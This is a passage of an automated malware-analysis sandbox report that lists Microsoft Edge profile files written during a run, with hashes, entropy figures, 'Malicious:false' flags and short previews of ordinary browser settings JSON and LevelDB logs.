                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\19883c05-933a-4f1e-9505-34a533e8efb6.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):115717
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                      MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                      SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                      SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                      SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\20b91d6f-5b85-4770-8173-372ce7211861.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):40470
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.561142478305725
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:h8FEbs7pLGLPS0WP1hfrB8F1+UoAYDCx9Tuqh0VfUC9xbog/OV2CI/muGdtrwFMl:h8FEbQcPS0WP1hfrBu1jajCIDYWFM8XM
                                                                                                                                                                                                                                                                                                      MD5:67ACD9EF8C9CF8E1E4EEF770107CE178
                                                                                                                                                                                                                                                                                                      SHA1:77BABCAC196C142C6446F25A8B4C6EDAA375245A
                                                                                                                                                                                                                                                                                                      SHA-256:EA4056ECB527DAAF6221AFCB3C15A1F4BB3C9D3F99ED69B6E40A222145F7ECFC
                                                                                                                                                                                                                                                                                                      SHA-512:5BE1E577AAD15205B41466AE8EA9C51F187F36D53DC0585F33E80E11772A504F1EC104B3E43F107B373C915CFA962953CA2891E1EEE3441136C4704A9B714A11
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326091490196","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326091490196","location":5,"ma

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\2431c747-b3f5-4e57-8ee1-e4c320a1e517.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):12337
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.189056965479227
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:stSJ99QTryDiTbatSuyX1s+PGyaNP9k8Z3382bV+FiABO3/T1P5YJ:stSPGoSu8seGtJrnbGigO3w
                                                                                                                                                                                                                                                                                                      MD5:E7679D44823EC2B1E879A94755ED3D73
                                                                                                                                                                                                                                                                                                      SHA1:F9551C029AD9624C5F5E13ACB3F51EBF1959182F
                                                                                                                                                                                                                                                                                                      SHA-256:139023606642C645497265F464FB6F97AF33F9ACD47701E42B6DFD0A9374FF47
                                                                                                                                                                                                                                                                                                      SHA-512:68DAAAD0218AB20AFB77EBC46B457A4EF0F8EA4A567ECD3EBE96E426D6C7AE2975AAF708581C0B148E838839AB1F1CF9A203D9E463DAC19517A10744A1916F83
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326092147419","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3e37dafb-59f2-4032-9774-942f7e49096b.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\593b4182-9712-4d99-8606-8c6d93926054.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):38627
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.554851466796747
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:h8FEbs7pLGLPS0WP1hfrB8F1+UoAYDCx9Tuqh0VfUC9xbog/OVt/muGdtrwFM8qc:h8FEbQcPS0WP1hfrBu1ja0DYWFM8nkX4
                                                                                                                                                                                                                                                                                                      MD5:0ED7E22A8B7B0047216FF4EEAAC6FAC5
                                                                                                                                                                                                                                                                                                      SHA1:007F37397973AE4C1DB27D08A98D4FDF729ED717
                                                                                                                                                                                                                                                                                                      SHA-256:3FAD04E701E002350BD8E07FBC6425D1EE737B2B579C50A3A9479A86D5C704AF
                                                                                                                                                                                                                                                                                                      SHA-512:F8845446B5975B065D91E2A21AD8620C58B3FBA2F719DA02577D38228581206D9F1741E6032C63B8D901E7119FC130D933EF87881FFBD28501BF538C75F1A8F9
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326091490196","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326091490196","location":5,"ma

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9382d68b-8b76-498c-b66b-a93c89c290bc.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):13095
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.268146839580779
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:stSJ99QTryDiTbatSuyX1s+PGyaNPVznv6Ak8Z3382bV+FiAIO3/oKP5YJ:stSPGoSu8seGtJVznv5nbGiNO3wZ
                                                                                                                                                                                                                                                                                                      MD5:E669337F702E285EBD755A8D55074E82
                                                                                                                                                                                                                                                                                                      SHA1:1472A39FCE34BDD72950814BB2641F2632A6CB42
                                                                                                                                                                                                                                                                                                      SHA-256:AAE5B0BD61BBBDBADA327B89914FF08B49907E37CF7022684461D88C21850C6F
                                                                                                                                                                                                                                                                                                      SHA-512:23AE2B3E5BA57BB20E0978A13ED5123803340021DEC5DA014CD54A2A070AAA6E3DDA09D99B9A61570290D5CA0F9E0D8B12227C1BCF781DFE1349DA794DB72069
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326092147419","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\966261e8-5b25-411e-a00a-ad3295658645.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):13095
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.268111068793006
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:stSJ99QTryDiTbatSuyX1s+PGyaNPVznv6Ak8Z3382bV+FiAhO3/oKP5YJ:stSPGoSu8seGtJVznv5nbGigO3wZ
                                                                                                                                                                                                                                                                                                      MD5:8B55929268DC92ABC2AAEFBBFF54265D
                                                                                                                                                                                                                                                                                                      SHA1:E800D7C5F85C2F962BC046E1F735DB33EF2BD26D
                                                                                                                                                                                                                                                                                                      SHA-256:F10F41E35D64CFC93A08D722C98276C01E35248B6F9FC0F66FF0780B5823CC1A
                                                                                                                                                                                                                                                                                                      SHA-512:4DF352260248818E8C195EDD5E85AA981711FF0F805E950DE58126709FB99691F2D841B2B1B3D3657A445D6771AD9D44396D05757A75945D582DFB3B32DEE371
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326092147419","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):33
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                      MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                      SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                      SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                      SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):315
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.266768126296948
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:7+B1cNwi23oH+Tcwtp3hBtB2KLlp1Q+q2PcNwi23oH+Tcwtp3hBWsIFUv:7+PZYebp3dFLT1VvLZYebp3eFUv
                                                                                                                                                                                                                                                                                                      MD5:A728CBB76FC91D00D6823BB231D42FE7
                                                                                                                                                                                                                                                                                                      SHA1:6010726A69F1A1BF15E984DB6C0B1A1DBB2E7D11
                                                                                                                                                                                                                                                                                                      SHA-256:C499029819828B5F64691E83152F6040C170753C4D1C538746EA16DF9D81531A
                                                                                                                                                                                                                                                                                                      SHA-512:D4FB7263444155834C11B243F079140CAEA95AEF90D617A5A851475478E1635CB9265889F54B8BD88FF9B416110122AF24A3A67C6861FFD498D0045944DC3B1D
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-12:41:38.247 2068 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/10-12:41:39.039 2068 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                      Size (bytes):1696115
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.04063606622668
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24576:k/f76gGkISshcFdmcOAoPENUpifYP+MbI2T:k/fgAmmE
                                                                                                                                                                                                                                                                                                      MD5:C81935C8A1C8BF831A2F78E1B01D82F7
                                                                                                                                                                                                                                                                                                      SHA1:B16DEF9A808499DA743D6A50D7DE6118973A8848
                                                                                                                                                                                                                                                                                                      SHA-256:61868816CAA5A02803C1957FA5423B188C7B499EA034DF63BE74F3CC91DB3342
                                                                                                                                                                                                                                                                                                      SHA-512:7BE90FDDFF38899A6E754ED993937118026ACC73A910BE60964FAB61356F7D41CB1E08E35F9522D3E47149FA17842FA3D981C4C952C2AB88CA138B31D6BA6195
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340965219355520.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):342
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.125103564869669
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:7ivFvVFIq2PcNwi23oH+Tcwt9Eh1tIFUt8OishZmw+OioivzkwOcNwi23oH+Tcw+:7ivxVFIvLZYeb9Eh16FUt8Oish/+Oinr
                                                                                                                                                                                                                                                                                                      MD5:8AFD9A921E575C2A0E7664E7E38B52C4
                                                                                                                                                                                                                                                                                                      SHA1:17027710887CDB43613220147CA993786600D603
                                                                                                                                                                                                                                                                                                      SHA-256:A10DFACCCD249E2153445D4EC0150D6DF3966A1CA363D3BF6F92424A4D8F5730
                                                                                                                                                                                                                                                                                                      SHA-512:F232137C679734D58BFBAD7005610A2FBB0AA8F648974AAADA78C6F3EB0B7F3AA26EB754AA35D5FD845A7C9FDEAD7F0A64C06477096B54B5E50A5CAA8AF0DFCE
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-14:07:46.194 21c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/10-14:07:46.195 21c0 Recovering log #3.2024/12/10-14:07:46.219 21c0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):342
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.125103564869669
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:7ivFvVFIq2PcNwi23oH+Tcwt9Eh1tIFUt8OishZmw+OioivzkwOcNwi23oH+Tcw+:7ivxVFIvLZYeb9Eh16FUt8Oish/+Oinr
                                                                                                                                                                                                                                                                                                      MD5:8AFD9A921E575C2A0E7664E7E38B52C4
                                                                                                                                                                                                                                                                                                      SHA1:17027710887CDB43613220147CA993786600D603
                                                                                                                                                                                                                                                                                                      SHA-256:A10DFACCCD249E2153445D4EC0150D6DF3966A1CA363D3BF6F92424A4D8F5730
                                                                                                                                                                                                                                                                                                      SHA-512:F232137C679734D58BFBAD7005610A2FBB0AA8F648974AAADA78C6F3EB0B7F3AA26EB754AA35D5FD845A7C9FDEAD7F0A64C06477096B54B5E50A5CAA8AF0DFCE
                                                                                                                                                                                                                                                                                                      Malicious:false
